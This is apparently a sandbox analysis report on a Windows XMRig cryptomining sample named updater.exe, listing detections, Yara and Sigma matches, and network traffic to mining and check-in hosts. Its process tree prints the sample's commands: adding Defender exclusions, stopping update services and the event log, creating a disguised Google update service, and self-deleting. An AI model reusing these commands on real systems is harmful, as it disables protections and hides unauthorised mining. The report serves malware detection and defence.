Windows Analysis Report
updater.exe

Overview

General Information

Sample name: updater.exe
Analysis ID: 1526527
MD5: a0c374f31894aa332d158f56608c89c3
SHA1: 0236445a761fca6dcda1b9014beb78198dfae9f8
SHA256: ce7ca5446e66ce1e9190e16922fa33febb0789f27561aa820d1d1bf14c86cfe1

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Uses powercfg.exe to modify the power settings
Abnormal high CPU Usage
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • updater.exe (PID: 5060 cmdline: "C:\Users\user\Desktop\updater.exe" MD5: A0C374F31894AA332D158F56608C89C3)
    • powershell.exe (PID: 7724 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1316 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wusa.exe (PID: 2600 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
    • sc.exe (PID: 5928 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 2248 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 32 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 7596 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 452 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 5412 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 3628 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 7012 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 1932 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5588 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 3028 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 308 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 7972 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4640 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • choice.exe (PID: 2248 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • updater.exe (PID: 3352 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: A0C374F31894AA332D158F56608C89C3)
    • powershell.exe (PID: 6340 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1400 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wusa.exe (PID: 4688 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
    • sc.exe (PID: 6772 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5192 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 1604 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 7456 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 3376 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 5240 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 5812 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 4432 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 2872 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • svchost.exe (PID: 6248 cmdline: svchost.exe MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author (matched strings are listed under each row)
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37eb98:$a1: mining.set_target
  • 0x370e20:$a2: XMRIG_HOSTNAME
  • 0x373748:$a3: Usage: xmrig [OPTIONS]
  • 0x370df8:$a4: XMRIG_VERSION
Process Memory Space: svchost.exe PID: 6248 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Process Memory Space: svchost.exe PID: 6248 | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x20e73:$a1: mining.set_target
  • 0x1d61c:$a2: XMRIG_HOSTNAME
  • 0x1e394:$a3: Usage: xmrig [OPTIONS]
  • 0x1d5fd:$a4: XMRIG_VERSION
62.2.svchost.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
62.2.svchost.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight
62.2.svchost.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
62.2.svchost.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION

Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5412, ProcessName: powercfg.exe

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7724, ProcessName: powershell.exe
Source: Process started; Author: David Burkett, @signalblur; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\Google\Chrome\updater.exe, ParentImage: C:\ProgramData\Google\Chrome\updater.exe, ParentProcessId: 3352, ParentProcessName: updater.exe, ProcessCommandLine: svchost.exe, ProcessId: 6248, ProcessName: svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7724, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\Google\Chrome\updater.exe, ParentImage: C:\ProgramData\Google\Chrome\updater.exe, ParentProcessId: 3352, ParentProcessName: updater.exe, ProcessCommandLine: svchost.exe, ProcessId: 6248, ProcessName: svchost.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 3028, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7724, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\Google\Chrome\updater.exe, ParentImage: C:\ProgramData\Google\Chrome\updater.exe, ParentProcessId: 3352, ParentProcessName: updater.exe, ProcessCommandLine: svchost.exe, ProcessId: 6248, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 308, ProcessName: sc.exe

Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                                 Source IP      Source Port  Destination IP  Destination Port  Protocol
2024-10-06T01:46:18.491045+0200  2051004  2         Crypto Currency Mining Activity Detected  192.168.11.20  49758        172.67.162.29   80                TCP
2024-10-06T01:47:17.850114+0200  2051004  2         Crypto Currency Mining Activity Detected  192.168.11.20  49760        172.67.162.29   80                TCP
2024-10-06T01:48:19.635954+0200  2051004  2         Crypto Currency Mining Activity Detected  192.168.11.20  49761        172.67.162.29   80                TCP
2024-10-06T01:46:02.663461+0200  2826930  2         Crypto Currency Mining Activity Detected  192.168.11.20  49757        5.161.70.189    23333             TCP

AV Detection

Source: auto.c3pool.org, Virustotal: Detection: 6%
Source: minerchenzhi888.top, Virustotal: Detection: 12%
Source: http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=, Virustotal: Detection: 9%
Source: http://minerchenzhi888.top/api/endpoint.php, Virustotal: Detection: 8%
Source: http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblx, Virustotal: Detection: 9%
Source: C:\ProgramData\Google\Chrome\updater.exe, ReversingLabs: Detection: 95%
Source: C:\ProgramData\Google\Chrome\updater.exe, Virustotal: Detection: 82%
Source: updater.exe, ReversingLabs: Detection: 95%
Source: updater.exe, Virustotal: Detection: 82%

Bitcoin Miner

Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 6248, type: MEMORYSTR
Source: global traffic, TCP traffic: 192.168.11.20:49757 -> 5.161.70.189:23333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49fzyjh446z9uuadh1zmpzggiiycsvfxgcxbthdws6ogai4mpo1z9f52bf3pdhmq6gk92hbx9gpdqgunz2pkcvstb8xynxf","pass":"miner-49","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: svchost.exe, String found in binary or memory: cryptonight-monerov7
Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: updater.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb, source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr
Source: global traffic, TCP traffic: 192.168.11.20:49757 -> 5.161.70.189:23333
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Network traffic, Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.11.20:49761 -> 172.67.162.29:80
Source: Network traffic, Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.11.20:49758 -> 172.67.162.29:80
Source: Network traffic, Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.11.20:49760 -> 172.67.162.29:80
Source: Network traffic, Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.11.20:49757 -> 5.161.70.189:23333
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: auto.c3pool.org
Source: global traffic, DNS traffic detected: DNS query: minerchenzhi888.top
Source: unknown, HTTP traffic detected:
  POST /api/endpoint.php HTTP/1.1
  Accept: */*
  Connection: close
  Content-Length: 467
  Content-Type: application/json
  Host: minerchenzhi888.top
  User-Agent: cpp-httplib/0.12.6
Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr, String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr, String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr, String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr, String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 0000003E.00000002.346493278590.00000254DD626000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://minerchenzhi888.top/api/endpoint.php
Source: svchost.exe, 0000003E.00000002.346493278590.00000254DD65F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=
Source: svchost.exe, 0000003E.00000002.346493622809.00000254DD6F2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://minerchenzhi888.top/api/endpoint.phpT
Source: svchost.exe, 0000003E.00000003.345290459404.00000254DD671000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblx
Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: https://172.94.1q
Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: https://xmrig.com/docs/algorithms

System Summary

Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: Detects coinmining malware, Author: ditekSHen
Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
Source: Process Memory Space: svchost.exe PID: 6248, type: MEMORYSTR, Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
